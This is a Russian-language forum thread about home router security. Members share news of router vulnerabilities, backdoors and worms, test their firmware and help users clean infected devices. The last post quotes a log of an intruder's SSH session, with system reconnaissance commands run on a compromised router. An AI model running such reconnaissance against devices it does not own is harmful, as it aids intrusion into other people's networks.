А о чем, по-Вашему, эта тема?!



чем грозит как думаете?

А чем может грозить захваченный роутер? Съесть Ваш трафик, "засветить" IP на сайтах противоправной направленности (экстремистских, распространяющих детское порно, и т. д.) и привлечь к этому IP внимание правоохранительных органов, перехватывать ваш трафик, в том числе пароли и куки, и использовать их для распространения спама... Продолжать?



где еще чего посмотреть?

А что, в роутере дофига мест, "где посмотреть"?



upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражения подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)
Ставьте новую прошивку, делайте сброс в заводские установки, удаляёте всё с носителей и из flashfs. И не отключайте бездумно фаервол!

Ghost_SS
09-08-2012, 08:31
ММММ...
Да наверное все что хотели то и делали. Суди по скриптам самое интересное в файлике что скачивался. Хочешь узнать где наследил скачай его и посмотри в нутрь.
А так от ДОС атак до банального перехвата паролей к сайтам, вебмани, киви, почты, и т.д. если дома клиент банк то ты ввобще победитель=)

Присоеденяюсь к словам : "Все в дефолт"


А самое главное не оставлять пароль админа штатным, думаю при том что ты отключил фаирвол открыл телнет сдоступом по wan.

Virtuals
14-11-2012, 14:16
надеюсь дефолтный пароль меняли? ибо досихпор бродит по сети вирусняк для роутеров... признаки: тормозит ребутится .... в процессах дофига висит с именем mips

Alexey
15-11-2012, 04:17
надеюсь дефолтный пароль меняли? ибо досихпор бродит по сети вирусняк для роутеров... признаки: тормозит ребутится .... в процессах дофига висит с именем mips

Кстати, пароль не менял. Надо будет попробовать. Хотя процессов mips не обнаружено.
Еще вычитал, что бывают проблемы с подключением гигабитных устройств.

Будет чем завтра на работе заняться.
Попробовать заменить БП, попробовать отключить все от сети, и если ничего не поможет, то восстановление с помощью перепрошивки и смена пароля

Заменил БП на другой - лучше не стало
Отключил от роутера все, кроме одной 100Мб сети, по прежнему перезагружается.

Может есть еще варианты, что можно посмотреть?

Omega
18-01-2013, 20:15
Критические уязвимости в беспроводных маршрутизаторах Cisco Linksys


Исследователи безопасности предупредили (http://seclists.org/fulldisclosure/2013/Jan/69) о скорой публикации в открытом доступе
информации о критической уязвимости в беспроводных маршрутизаторах Cisco Linksys. Уязвимость позволяет из внешней сети получить
доступ к устройству под пользователем root без проведения аутентификации. Компания Cisco была уведомлена о проблеме несколько
месяцев назад, но исправление так и не было выпущено. В настоящее время все доступные версии прошивки Linksys уязвимы, что ставит
под удар около 70 млн находящихся в сети устройств. Выявившие уязвимость исследователи не намерены больше скрывать информацию
от общественности и планируют дать компании Cisco ещё две недели на подготовку обновления прошивки, после чего опубликовать
детали уязвимости и концептуальный прототип эксплоита.

http://www.youtube.com/watch?feature=player_embedded&v=cv-MbL7KFKE


>> Похоже, альтернативы dd-wrt особо-то и нет.
> zRouter на базе FreeBSD ( http://zrouter.org/ )
> openWRT
> RouterOS
> Gargoyle
wive-ng ( более оптимизированный на потребление ресурсов озу и цпу, в отличии от dd-wrt ) = http://sourceforge.net/projects/wive-ng/

> wive-ng ( более оптимизированный на потребление ресурсов озу и цпу )
А что, она уже поддерживает девайсы на броадкоме? oO

> zRouter на базе FreeBSD ( http://zrouter.org/ )
Это для желающих с роутером мучаться, а не пользоваться оным.

> openWRT
А там недопиленo и требует шаманства руками, как то сборка из транка и патчинг. Вариант, но не для средних умов.

> RouterOS
Огороженная и закрытая хрень. Теоретически сорц получить можно. Практически, проще сразу застрелиться, чем иметь дело с этими господами.

> Gargoyle
Довольно странная прошивка "на любителя".

> томато от шибби
Что такое tomato я уже примерно знаю, а что такое шибби?

> Что такое tomato я уже примерно знаю, а что такое шибби?
Вы ещё спросите, кто такой Олег :)

http://www.opennet.ru/openforum/vsluhforumID3/88202.html :rolleyes:

ryzhov_al
20-01-2013, 05:16
Критические уязвимости в беспроводных маршрутизаторах Cisco LinksysЭти «специалисты по безопасности » сломали роутер из LAN-сегмента и теперь громко кричат о критической уязвимости, хотя из LAN-сегмента нет никакой защиты by design.

Специалисты, my ass.

hairpin
01-02-2013, 18:26
В прошивке присутствует libupnp с обнаруженной уязвимостью http://seclists.org/bugtraq/2013/Jan/130 ?
Где-то читал, что даже с внешнего интерфейса UPnP уязвим. Это правда?

AlexeyS
02-02-2013, 10:02
В прошивке присутствует libupnp с обнаруженной уязвимостью http://seclists.org/bugtraq/2013/Jan/130 ?
Где-то читал, что даже с внешнего интерфейса UPnP уязвим. Это правда?

У нас уже давно miniupnpd вместо нее.

hairpin
02-02-2013, 17:41
У нас уже давно miniupnpd вместо нее.
Не одна libupnp уязвима, miniupnp 1.0 тоже
Stack-based buffer overflow in the ExecuteSoapAction function in the SOAPAction handler in the HTTP service in MiniUPnP MiniUPnPd 1.0 allows remote attackers to execute arbitrary code via a long quoted method.
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0230
Я проверил на своем RT-N16: на заводской прошивке 3.0.0.4.260 с включенным UPnP для теста Rapid7 (http://upnp-check.rapid7.com/) оказался неуязвим.
По данным Rapid7: "332 products use MiniUPnPd version 1.0, which is remotely exploitable. Over 69% of all MiniUPnPd fingerprints were version 1.0 or older."

AlexeyS
02-02-2013, 19:00
Я тоже проверил свой wl500gp с местной прошивкой, вердикт - не уязвим. Так что беспокоиться не о чем.

Omega
07-02-2013, 11:44
Критическая уязвимость во многих роутерах различных вендоров


Как сообщалось ранее, компания DefenseCode обнаружила уязвимость нулевого дня в роутерах Cisco Linksys.
Представители компании оповестили вендора и взяли тайм-аут на пару недель перед раскрытием деталей уязвимости.
Время вышло, некоторые подробности были раскрыты и оказалось, что не только Cisco Linksys уязвима.
Вот только часть вендоров, где присутствует уязвимость:

Asus
Broadcom
Cisco
D-Link
Netgear
TP-Link
Zyxel
US Robotics
Речь идёт о сразу нескольких уязвимостях, которые кроются в ряде реализаций протокола UPnP и SSDP
(основанные на Intel/Portable UPnP SDK и MiniUPnP SDK):

1. CVE-2012-5958
2. CVE-2012-5959
3. CVE-2012-5960
4. CVE-2012-5961
5. CVE-2012-5962
6. CVE-2012-5963
7. CVE-2012-5964
8. CVE-2012-5965
9. CVE-2013-0229
10. CVE-2013-0230
Уязвимости позволяют вызвать отказ в обслуживании или выполнить произвольный код на устройстве без авторизации. А т.к. многие
роутеры взаимодействуют с UPnP через WAN, это делает их уязвимыми не только к атаке из локальной сети, но и из удалённых сетей.

Т.е. практически с любого компьютера Интернета. Уязвимыми могут оказаться не только роутеры, но вообще любое оборудование,
использующее UPnP: принтеры, медиа-серверы, IP-камеры, NAS, smart TV и т.д. Т.е. речь идёт о миллионах устройств!
http://habrahabr.ru/post/168613/ :rolleyes: http://habrahabr.ru/post/165737/ :confused:

AndreyUA
07-02-2013, 12:41
Проверил последнюю бета оф прошиву на rt15u. Уязвимость есть. Думаю, что эта же уязвимость будет на всех rtn,ведь sdk один и тот же .
http://upnp-check.rapid7.com/

Vampik
07-02-2013, 13:45
Что это за бред.

1) У каких-то вендоров в прошивке открыт UPnP через WAN? Это критическая проблема, с их штатными программистами.
2) Уязвимости подвержены старые версии ПО, в частности относительно того же miniupnpd - версии 1.0-1.3 (у нас 1.7.20120824). Это опять же проблема вендоров.

Нашей прошивки не касается :)

Ant-125
07-02-2013, 14:49
9448

Вроде нормально WL500gP.v1 1.9.2.7-rtn-r4772

Vampik
07-02-2013, 16:30
report WAN address и доступ из WAN - две разные вещи. Кстати, этот переключатель (WAN/MAN) ничего не делает, надо его убрать из прошивки.

Ant-125
07-02-2013, 17:03
А чекбокс "Enable access from WAN" тогда к чему относится? Он вроде находится на строчке "Multicast to HTTP Proxy"...

Vampik
07-02-2013, 17:24
А чекбокс "Enable access from WAN" тогда к чему относится? Он вроде находится на строчке "Multicast to HTTP Proxy"...
Относится к udpxy.

IrWert
08-02-2013, 02:51
http://habrahabr.ru/post/168613/
Оно нас не касается?

Vampik
08-02-2013, 05:28
http://habrahabr.ru/post/168613/
Оно нас не касается?

http://wl500g.info/showthread.php?19014-%C2%ED%E8%EC%E0%ED%E8%E5!-%C1%E5%E7%EE%EF%E0%F1%ED%EE%F1%F2%FC-Linux-based-mipsel-%F0%EE%F3%F2%E5%F0%EE%E2!&p=258142#post258142
http://habrahabr.ru/post/168613/#comment_5838187

AlexeyS
08-02-2013, 06:16
report WAN address и доступ из WAN - две разные вещи. Кстати, этот переключатель (WAN/MAN) ничего не делает, надо его убрать из прошивки.

Вообще-то он предназначен для случаев с dual-access, когда роль WAN выполняет интерфейс ppp, man - физический интерфейс. Не надо его удалять!

KOCTET
08-02-2013, 07:20
http://habrahabr.ru/post/168613/#comment_5838187
Плакал на этим постом :D
Ну и собственно в видео показывающее эту уязвимость атака на роутер почему то была из лан сети, т.е. роутер они ломали по адресу 192.168.1.1

Vampik
08-02-2013, 07:23
Вообще-то он предназначен для случаев с dual-access, когда роль WAN выполняет интерфейс ppp, man - физический интерфейс. Не надо его удалять!

Посмотрите в код - выбор Report MAN address или Report WAN address для UPnP остался в прошивке со времен Asus UPnPd и сейчас не делает н-и-ч-е-г-о.

AndreyUA
09-02-2013, 21:39
Что это за бред.

1) У каких-то вендоров в прошивке открыт UPnP через WAN? Это критическая проблема, с их штатными программистами.
2) Уязвимости подвержены старые версии ПО, в частности относительно того же miniupnpd - версии 1.0-1.3 (у нас 1.7.20120824). Это опять же проблема вендоров.

Нашей прошивки не касается :)
Под rt-n имел ввиду все асусовские прошивки.

ABATAPA
21-03-2013, 18:29
Проведено сканирование портов всех IPv4-адресов с использованием ботнета из маршрутизаторов.

Подведены итоги амбициозного проекта Internet Census 2012, нацеленного на полное сканирование портов для всех IPv4-адресов в сети Интернет. Сканирование осуществлялось с марта по декабрь 2012 года с использование ботнета, построенного на базе незащищённых маршрутизаторов.

Подробности (http://www.opennet.ru/opennews/art.shtml?num=36454)

ABATAPA
19-04-2013, 21:52
Продолжу.

Исследование показало плачевное состояние защищённости SOHO-маршрутизаторов.

http://www.opennet.ru/opennews/art.shtml?num=36741

ConstAntz
20-04-2013, 08:32
Продолжу.

Исследование показало плачевное состояние защищённости SOHO-маршрутизаторов.

http://www.opennet.ru/opennews/art.shtml?num=36741


и 5 пока не афишируемых устройств для которых ещё не выпущены обновления прошивки с устранением уязвимостией. Во всех устройствах найдены проблемы, позволяющие получить доступ из внутренней локальной сети

Не наша проблема (при соблюдении примитивных мер безопасности), однако, за ссылку - спасибо!

Vampik
20-04-2013, 08:39
Не наша проблема (при соблюдении примитивных мер безопасности), однако, за ссылку - спасибо!

Ну знаете, многие самостоятельно делают роутер уязвимым, наплевав на меры безопасности. Например, сами открывают доступ к веб-интерфейсу из WAN (судя по количеству жалоб, когда я эту функцию у себя из веб-интерфейса убрал). И попробуй убеди, что так делать не нужно..

ghost38
24-04-2013, 21:12
Подскажите плиз, а прошивка поддерживает WPS? Если есть, то как вклбюючается? а то никак не могу подключить принтер по wifi. И кнопку wps жму - не соедняется... Прошивка 4923

Omega
19-10-2013, 08:39
Ну знаете, многие самостоятельно делают роутер уязвимым, наплевав на меры безопасности.
Например, сами открывают доступ к веб-интерфейсу из WAN (судя по количеству жалоб, когда
я эту функцию у себя из веб-интерфейса убрал). И попробуй убеди, что так делать не нужно..

Да, лучше вообще убрать доступ и даже сам WAN порт, особенно в дылинках :D
http://habrahabr.ru/post/183314/ ;) http://habrahabr.ru/post/197314/

Проверьте на всякий случай и их более новые модели на предмет бекдора :p

Продолжение квеста: http://habrahabr.ru/post/198218/ :p
http://www.opennet.ru/opennews/art.shtml?num=38208 :D
http://www.opennet.ru/opennews/art.shtml?num=38100 :)

Omega
26-10-2013, 14:52
Ну вот, дело дошло уже до утюгов и чайников :p

http://habrahabr.ru/post/199120/ :D

TReX
28-10-2013, 07:57
Ну вот, дело дошло уже до утюгов и чайников :p

http://habrahabr.ru/post/199120/ :D

Ветка все же по безопасности, может с таким в болталку? )

Omega
19-11-2013, 21:29
LG © 1984 http://habrahabr.ru/post/202770/ :cool:

ryzhov_al
28-11-2013, 17:37
Symantec сама написала (http://www.opennet.ru/opennews/art.shtml?num=38547) прототип вируса, эксплуатирующего майскую уязвимость в PHP на… роутерах.
К чему здесь упомянуты роутеры и почему Symantec таким уродливым способом привлекает к себе внимание лучше спросить у неё самой.

dimez
29-11-2013, 18:00
Symantec сама написала (http://www.opennet.ru/opennews/art.shtml?num=38547) прототип вируса, эксплуатирующего майскую уязвимость в PHP на… роутерах.
К чему здесь упомянуты роутеры и почему Symantec таким уродливым способом привлекает к себе внимание лучше спросить у неё самой.
Да, тоже недоумевал.
Акции упали с августа, надо хоть что-нибудь делать :)

ABATAPA
02-12-2013, 17:10
Объектами атаки данного червя являются маршрутизаторы, точки доступа, камеры слежения и подобное оборудование, использующее прошивку на основе Linux.

В настоящий момент выявленный экземпляр червя поражает только системы на базе архитектуры x86, но уже имеются свидетельства о наличии кода червя для архитектур ARM, PPC, MIPS и MIPSEL.

http://www.linux.org.ru/news/security/9877144

TReX
02-12-2013, 23:14
Объектами атаки данного червя являются маршрутизаторы, точки доступа, камеры слежения и подобное оборудование, использующее прошивку на основе Linux.

В настоящий момент выявленный экземпляр червя поражает только системы на базе архитектуры x86, но уже имеются свидетельства о наличии кода червя для архитектур ARM, PPC, MIPS и MIPSEL.

http://www.linux.org.ru/news/security/9877144

Ага, мы все умрем )) Эксплуатируется эта http://www.securityfocus.com/bid/53388 уязвимость, ну прямо про наши роутеры )))

ABATAPA
03-12-2013, 19:49
У некоторый стоит php, см. соседние ветки.

ryzhov_al
04-12-2013, 05:00
У некоторый стоит php, см. соседние ветки.Ни у кого из них он не может стоять по нужным путям, см. описание вируса.

ABATAPA
18-12-2013, 08:22
Эксперимент по изучению деятельности вредоносного ПО, нацеленного на поражение Linux-серверов

Наблюдая попытки проверки наличия уязвимостей в логе своего web-сервера, исследователь безопасности из Университета Джорджа Вашингтона решил устроить ловушку (honeypot) и понаблюдать за тем, что произойдёт в случае, если злоумышленники обнаружат наличие уязвимости. Для анализа содержимого памяти во время выполнения вредоносных программ использовался фреймворк Volatility.

Подробнее:
http://www.opennet.ru/opennews/art.shtml?num=38683

Omega
30-12-2013, 02:00
Взлом Wi-Fi роутеров! Интервью с хакером! (http://www.securitylab.ru/contest/447512.php) :D


http://www.youtube.com/watch?v=lX6JcybgDFo

MercuryV
30-12-2013, 10:00
Взлом Wi-Fi роутеров! Интервью с хакером! (http://www.securitylab.ru/contest/447512.php) :D
Еще одна мурзилка на тему "люди! смотрите! я умею запускать BackTrack!" :D

Omega
03-01-2014, 23:37
Бекдор в маршрутизаторах Linksys и Netgear

http://www.xakep.ru/post/61839/ :rolleyes:
https://github.com/elvanderb/TCP-32764
http://arstechnica.com/security/2014/01/backdoor-in-wireless-dsl-routers-lets-attacker-reset-router-get-admin/

TReX
04-01-2014, 12:45
Бекдор в маршрутизаторах Linksys и Netgear

http://www.xakep.ru/post/61839/ :rolleyes:
https://github.com/elvanderb/TCP-32764
http://arstechnica.com/security/2014/01/backdoor-in-wireless-dsl-routers-lets-attacker-reset-router-get-admin/

Предлагаю тогда следующую статью про маршрутизаторы GPON МТС/МГТС там вообще штатный бекдор, для конфигурации и управления, да и пароли стандартные неизменяемые )

Omega
06-01-2014, 18:10
Предлагаю тогда следующую статью про маршрутизаторы GPON МТС/МГТС
там вообще штатный бекдор, для конфигурации и управления, да и пароли
стандартные неизменяемые )
http://habrahabr.ru/post/188454/ ;)

Omega
17-02-2014, 20:04
Очередные уязвимости в маршрутизаторах: :cool:

Asus: http://www.securityfocus.com/archive/1/530985

Linksys: http://www.opennet.ru/opennews/art.shtml?num=39111

Omega
04-03-2014, 21:56
Очередные уязвимости в маршрутизаторах: :cool:
http://www.xakep.ru/post/62145/default.asp :p

Omega
02-08-2014, 21:30
Взлом Asus RT-AC66U: http://habrahabr.ru/post/230469/ :cool:

Omega
17-08-2014, 10:03
Исследование безопасности прошивок сетевых устройств: :D

http://www.opennet.ru/opennews/art.shtml?num=40376

Omega
12-01-2015, 15:48
В маршрутизаторах ASUS обнаружена уязвимость CVE-2014-9583 (http://www.securitylab.ru/news/469606.php)


Брешь присутствует в сервисе обнаружения локальной сети infosvr, работающем с правами суперпользователя.

Эксперт из Accuvant Labs Джошуа Дрейк (Joshua Drake) обнаружил уязвимость в маршрутизаторах ASUS,
позволяющую злоумышленникам, имеющим доступ к локальной сети, выполнять произвольные команды.
По словам Дрейка, брешь CVE-2014-9583 присутствует в сервисе обнаружения локальной сети infosvr,
работающем с правами суперпользователя.

Сервис «слушает» порт 9999, который может использоваться злоумышленниками для отправки пакетов,
содержащих вредоносный код, с целью получить контроль над устройством. Дрейк успешно осуществил
атаки на маршрутизатор ASUS RT-N66U с версией прошивки 3.0.0.376.2524-g0013f52. ИБ-эксперт Дэвид
Лонгенекер (David Longenecker) подтвердил наличие уязвимости и в наиболее новой модели RT-AC87U
с версией прошивки 3.0.0.4.378_3754.

Лонгенекер сообщил, что размер эксплоита для этой бреши не должен превышать 237 знаков, иначе
устройство может выйти из строя из-за переполнения буфера. ASUS известно об уязвимости, и компания
работает над ее исправлением. Отметим, что эксплоит доступен публично, поэтому пользователи должны
принять меры по обеспечению безопасности.

Кастомизированная версия прошивки Asuswrt-Merlin, разработанная Эриком Соважо (Eric Sauvageau),
смягчает потенциальные атаки путем отключения функции, ответственной за удаленное выполнение кода

Подробнее ознакомиться с описанием уязвимости можно по адресу: http://www.securitylab.ru/vulnerability/469610.phphttp://www.securitylab.ru/news/469606.php :eek:


Проверил, эксплоит не сработает даже из LAN, у нас обрезанная версия infosvr, в которой
отсутствует NET_CMD_ID_MANU_CMD. Его очень давно обрезал камрад theMIROn, оставив
только отдачу информации о себе (IP,MAC,name).
http://forum.ixbt.com/topic.cgi?id=14:62022-59#2039 ;)

AndreyPopov
13-01-2015, 12:21
ASUS выпустил прошивки для закрытия этой дырки вчера 12.01.2015

для серии RT-N версия 3.0.0.4.376.3754
для серии RT-AC версия 3.0.0.4.378.3873(3885)

Omega
27-01-2015, 13:32
Очередные приколы от Корбилайна: http://habrahabr.ru/post/243997/ :cool:

Omega
27-01-2015, 21:34
http://habrahabr.ru/company/dsec/blog/249007/ :p

Omega
13-03-2015, 21:58
Эксплуатируем root-уязвимость в роутерах Asus (http://habrahabr.ru/post/253013/)

TReX
13-03-2015, 23:30
Очередные приколы от Корбилайна: http://habrahabr.ru/post/243997/ :cool:

Такие "статьи" однозначно в группу юмор, бред автора зашкаливает, 10-я сеть у Билайна для роутера внешняя, поверх нее запускается тоннель L2TP, так что увидеть в ней компьютер можно только если он напрямую включен без роутера, получить логины в роутер так же невозможно, если разрешен доступ в вебморду только из локальной сети, которая для роутера по умолчанию будет 192.х.х.х, а никак не 10.х.х.х...


Не имея логина/пароля от «Билайна», просто воткнув провод, я получал доступ ко всем локальным ресурсам и устройствам (роутерам, камерам, voip железкам итп)

)))))))) бесподобный шедевр, и как увидеть например voip или камеру, если они за роутером и естественно за NATом?


Подключаем сеть, и, даже без интриги, имеем качественный интернет через провод, а не через wifi. Заходим на роутер, смотрим — да действительно, мы подключены к нему как-будто в lan.
А вот это алмаз, в его коллекции, зашли через WAN и попали как клиент в LAN, автора даже не смущает то что сети на якобы "скриншоте" разные ))))))))))))

Omega
24-04-2015, 23:19
Критическая уязвимость (CVE-2015-1863) в wpa_supplicant, компоненте для подключения к беспроводным сетям (http://www.opennet.ru/opennews/art.shtml?num=42097) :p

ABATAPA
27-05-2015, 06:36
http://www.opennet.ru/opennews/art.shtml?num=42309

Omega
24-07-2015, 22:48
Корбилайн вмешивается в трафик пользователей (http://habrahabr.ru/post/262631/) :p

Omega
02-10-2015, 22:52
Добрый вирус Linux.Wifatch защищает роутеры от других угроз (http://geektimes.ru/post/263312/)


Обнаруженный Symantec вирус для роутеров заражает устройства и защищает их от вредоносного программного обеспечения,
он напоминает пользователю о необходимости обновить ПО, сменить пароли и закрывает уязвимости от других вирусов.
http://geektimes.ru/post/263312/ :rolleyes:

Omega
22-02-2016, 23:24
Билайн подставляет в транзитный HTTP-трафик свой JavaSсript-код (https://www.opennet.ru/opennews/art.shtml?num=43918)


Внедряемый JavaScript-код имеет полный доступ к контексту всех незашифрованных страниц и может контролировать
весь идущий через них информационный поток, в том числе вводимые пользователем пароли, параметры идентификации,
частную переписку и т.п. Согласие на применение данного сервиса абонентом не давалось, подстановка JavaSсript-кода
в трафик осуществлена односторонним решением оператора.

TReX
22-02-2016, 23:57
Билайн подставляет в транзитный HTTP-трафик свой JavaSсript-код (https://www.opennet.ru/opennews/art.shtml?num=43918)

Точнее говоря мобильный Билайн, хотя то же самое делает например и МаксимаТелеком, денежки за рекламу всем хочется ))

Omega
25-02-2016, 00:12
Rogue AP — фальшивые точки доступа (https://habrahabr.ru/company/pentestit/blog/277793/) :cool:


При настройке беспроводного адаптера на автоматическое подключение к известным беспроводным сетям пользователь подвергает
себя риску стать жертвой атаки «человек посередине». Злоумышленник может создать доверенную Wi-Fi точку доступа.
В результате клиентское устройство автоматически подсоединится к такой точке доступа и будет работать через нее, а атакующий
получит возможность перехватывать трафик жертвы, либо атаковать устройство, находящееся с ним в одном сегменте сети.

Omega
02-04-2016, 02:15
ЧЕРВЬ REMAITEN СТРОИТ БОТНЕТ ИЗ МАРШРУТИЗАТОРОВ


Антивирусная компания ESET сообщает о появлении нового червя. Вредоносная программа, получившая название Remaiten,
распространяется по Telnet и строит ботнет из маршрутизаторов, точек доступа Wi-Fi и других сетевых устройств.

Специалисты ESET полагают, что Remaiten представляет собой усовершенствованный вариант червей Gafgyt и Kaiten,
обнаруженных осенью 2014 года.
Gafgyt служил для кражи информации с поражённых компьютеров, а Kaiten использовали для организации DDoS-атак.

Как и Remaiten, Gafgyt поражает своих жертв по протоколу Telnet. Для этого вредоносная программа сканирует порт Telnet
на произвольных IP-адресах.Когда ей удаётся найти работающий Telnet, она пытается подобрать к нему пароль по списку.
В случае успеха жертва получит команду скачать исполняемые файлы червя, скомпилированные для различных архитектур.

Remaiten действует почти так же. Единственное отличие заключается в том, что он не скачивает все возможные файлы.
Вместо этого червь пытается определить архитектуру жертвы, а затем самостоятельно отправляет ей подходящий файл.
Для этого к Remaiten прилагаются четыре исполняемых файла для устройств на базе Linux с процессорами ARM и MIPS.

После установки Remaiten подключается к командному каналу IRC и ожидает указаний. Анализ кода червя показывает,
что он способен участвовать в DDoS-атаках различных типов. Кроме того, в нём предусмотрен код, который избавляет
заражённое устройство от конкурирующих ботов других типов.
https://xakep.ru/2016/04/01/remaiten/ :cool:

Omega
06-04-2016, 01:23
Разбор полетов (http://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/) :D


Killing other bots

Another interesting command is “KILLBOTS”. When issued, the bot will enumerate running processes and decide which to ignore
and which to kill based on a few criteria, but mainly because of their names. These process names can differ across bot versions.

Linux/Remaiten will only kill processes that were started from an interactive shell by looking at the process’s tty device number.
It will also report the name of the killed process to its C&C server, perhaps to improve their whitelist and blacklist of process names

TReX
28-05-2016, 21:56
Ну вот и Asus больше не дает устанавливать альтернативные прошивки или откатываться назад на старые версии

ASUS has been dedicated to cooperate with third party developers to come up with more innovative features.
To comply with regulatory amendments, we have modified firmware verification rule to ensure better firmware quality.
This version is not compatible with all previously released ASUS firmware and uncertified third party firmware.

А как красиво написали, сотрудничаем со сторонними разработчиками ))

http://www.snbforums.com/threads/asus-firmware-will-change-the-verification-method.32357/ - немного форумных обсуждений

https://www.federalregister.gov/articles/2015/08/06/2015-18402/equipment-authorization-and-electronic-labeling-for-wireless-devices тот самый FCC из-за которого заварилась каша...

Omega
31-05-2016, 18:50
«Добрые хакеры» White Team сражаются с ботнетом Lizard Squad, взламывая роутеры (https://xakep.ru/2016/02/10/white-team-vs-lizard-squad/) :D


Хакерская группа White Team, немного ранее создавшая «добрый вирус» Linux.Wifatch, который инфицирует IoT-устройства
и исправляет на них уязвимости, продолжает бороться со злом. White Team рассказали, что в данный момент они заняты
борьбой с ботнетом известной хакерской группы Lizard Squad, в котором насчитывается порядка 120-150 тысяч девайсов.

Малварь Linux.Wifatch получила широкую известность осенью 2015 года, когда ее заметили специалисты компании Symantec.
В основном жертвами заражения становятся различные маршрутизаторы, но порой вирус поражает IP-камеры и IoT устройства.
Однако код Linux.Wifatch, написанный на Perl, не содержит вредоносных пейлоудов, и вирус не побуждает устройства к активности.

Попадая на устройство, Linux.Wifatch выходит в сеть по p2p-протоколу, с целью получения апдейтов. Затем малварь
проверяет это устройство. В случае обнаружения вредоносного ПО или уязвимостей, Linux.Wifatch все поправит.
В частности, он заметит подмену DNS, обнаружит бэкдоры, просит владельца устройства немедленно сменить
дефолтный пароль на нормальный, или может самостоятельно закрыть потенциально уязвимый Telnet-порт.

Omega
12-09-2016, 23:33
ATTENTION !!! Большой Брат следит за тобой !!!

BLUETOOTH-ВИБРАТОРЫ WE-VIBE СЛЕДЯТ ЗА ПОЛЬЗОВАТЕЛЯМИ (https://xakep.ru/2016/08/09/we-vibe-spy-on-you/) :p

(БЕЗ)УМНАЯ РОЗЕТКА. АНАЛИЗИРУЕМ УЯЗВИМОСТИ УМНОЙ РОЗЕТКИ TP-LINK HS110 WI-FI (https://xakep.ru/2016/08/31/hack-tp-link-hs110/) ;)

ЭКСПЕРТ КОМПАНИИ IOACTIVE НАШЕЛ МНОЖЕСТВО УЯЗВИМОСТЕЙ В РОУТЕРАХ ФИРМЫ BHU (https://xakep.ru/2016/08/23/bhu-wifi-urouter/) :rolleyes:

ЭКСПЕРТЫ PEN TEST PARTNERS СОЗДАЛИ ВЫМОГАТЕЛЯ, ЗАРАЖАЮЩЕГО ТЕРМОСТАТЫ (https://xakep.ru/2016/08/09/thermostat-hack/) :cool:

Omega
24-10-2016, 02:33
В ядре Linux обнаружена опасная 0-day уязвимость Dirty COW (https://habrastorage.org/files/f8c/c93/326/f8cc9332601b48ff9786f3836009b067.png) :confused:

https://habrahabr.ru/company/defconru/blog/313276/

З.Ы. https://sourceforge.net/p/wive-ng/wive-ng-mt/ci/bdf12bc55d84a5113e160cae4c0ee0121c55d782/ ;)

lly
24-10-2016, 09:16
CVE-2016-5195

Так как это исключительно local privilege escalation и публичных эксплойтов под старые ядра пока никто не выложил, панику разводить не надо :p

Но бэкпорт патча сделаю, как будет время.

Service2
23-02-2017, 15:11
Прошивка древняя
Linux version 2.6.22.19 (root@localhost) (gcc version 4.6.3 (GCC) ) #2 Mon Oct 8 18:11:53 YEKT 2012
1.9.2.7-rtn-r4667

Дело в том что эта зараза (в атачче выделены 3 файла, которые во многих папках появились), как-то залезла в файловую систему и там размножилась, а я думал что под линукс вирусов нет 😉
Думал, рекурсивно удалить в BusyBox файл, например «photo.scr».
locate file – найти все файлы с именем file — не находит locate. Подскажите как рекурсивно удалить файлы? На роутете много чего наставлено, и переустанавливать и настраивать не хотелось бы, поэтому хотел бы тупо удалить подозрительные файлы, но руками ходить лень. Могу приложить вывод команды какой нужно.
10305

don-pedro
27-02-2017, 08:37
Дело в том что эта зараза (в атачче выделены 3 файла, которые во многих папках появились), как-то залезла в файловую систему и там размножилась, а я думал что под линукс вирусов нет ��
Оказывается, есть.


Думал, рекурсивно удалить в BusyBox файл, например «photo.scr».
locate file – найти все файлы с именем file — не находит locate. Подскажите как рекурсивно удалить файлы?
find
В инете полно примеров.


На роутете много чего наставлено, и переустанавливать и настраивать не хотелось бы, поэтому хотел бы тупо удалить подозрительные файлы, но руками ходить лень. Могу приложить вывод команды какой нужно.
Прежде чем удалять, следует разобраться, откуда эти файлы взялись.

Service2
01-03-2017, 16:02
find
-sh: find: not found

Как и ожидалось, удаление руками на долго не помогло. Файлы с таким же именем опять появляются. Помогите разобраться и найти источник заразы?

don-pedro
02-03-2017, 07:32
find
-sh: find: not found

findutils надо поставить.


Как и ожидалось, удаление руками на долго не помогло. Файлы с таким же именем опять появляются. Помогите разобраться и найти источник заразы?
Если диск самбой расшарен, то источник заразы - домашние компы.

Omega
06-03-2017, 19:43
Помогите определить что происходит на прошивке RT-AC68U от Hugo - атакуют боты !
Логин не стандартный, пароль сложный 13 букв чисел с заглавными. Уже менял 3 раза пароли и логин.
SSH только по ключу. Логин и пароль отключены для SSH. порт произвольный.
Entware-ng не установлен, единственное что использую это StealthMode Sunset (Merlin) (http://monter.techlog.pl/files/download/_Projects/ASUSWRT/stealth_mode/sunset/)

Потом выполняется вход и SSH включают для wan и включают использование паролей в SSH и меняют порт на 2222

Mar 6 06:59:04 dropbear[29479]: Child connection from 190.137.111.208:48605
Mar 6 06:59:14 dropbear[29479]: Password auth succeeded for 'Born' from 190.137.111.208:48605
Mar 6 07:00:30 dropbear[29563]: Running in background
Mar 6 07:01:21 dropbear[29651]: Child connection from 190.137.111.208:36802
Mar 6 07:01:31 dropbear[29651]: Password auth succeeded for 'Born' from 190.137.111.208:36802
Mar 6 07:01:37 dropbear[29651]: User Born executing '/sbin/ifconfig'
Mar 6 07:01:41 dropbear[29651]: User Born executing 'cat /proc/meminfo'
Mar 6 07:01:45 dropbear[29651]: User Born executing '2>/dev/null sh -c 'cat /lib/libdl.so* || cat /lib/librt.so* || cat /bin/cat || cat /sbin/ifconfig''
Mar 6 07:01:51 dropbear[29651]: User Born executing 'cat /proc/version'
Mar 6 07:01:55 dropbear[29651]: User Born executing 'uptime'
Mar 6 07:01:59 dropbear[29651]: User Born executing '1>/dev/null 2>/dev/null /sbin/iptables -L -n && echo 1 || echo 0'
Mar 6 07:02:03 dropbear[29651]: User Born executing '(python -V 2>/dev/null && echo python && python -V) || (/usr/local/bin/python -V 2>/dev/null && echo /usr/local/bin/python && /usr/local/bin/python -V)'
Mar 6 07:02:06 dropbear[29651]: Exit (Born): Exited normally
Mar 6 07:04:34 dropbear[29940]: Child connection from 109.237.123.45:55826
Mar 6 07:04:42 dropbear[29940]: Password auth succeeded for 'Born' from 109.237.123.45:55826
